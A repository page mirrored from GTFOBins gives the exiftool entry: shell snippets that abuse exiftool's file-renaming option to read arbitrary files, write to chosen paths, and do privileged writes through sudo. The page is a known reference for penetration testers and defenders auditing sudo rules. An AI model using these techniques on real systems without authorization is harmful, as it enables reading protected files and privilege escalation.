1
0
Fork 0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-05-24 08:16:02 +02:00
GTFOBins.github.io/_gtfobins/exiftool.md
2021-01-09 15:03:35 +01:00

507 B

description functions
If the permissions allow it, files are moved (instead of copied) to the destination.
file-read file-write sudo
code
LFILE=file_to_read OUTPUT=output_file exiftool -filename=$OUTPUT $LFILE cat $OUTPUT
code
LFILE=file_to_write INPUT=input_file exiftool -filename=$LFILE $INPUT
code
LFILE=file_to_write INPUT=input_file sudo exiftool -filename=$LFILE $INPUT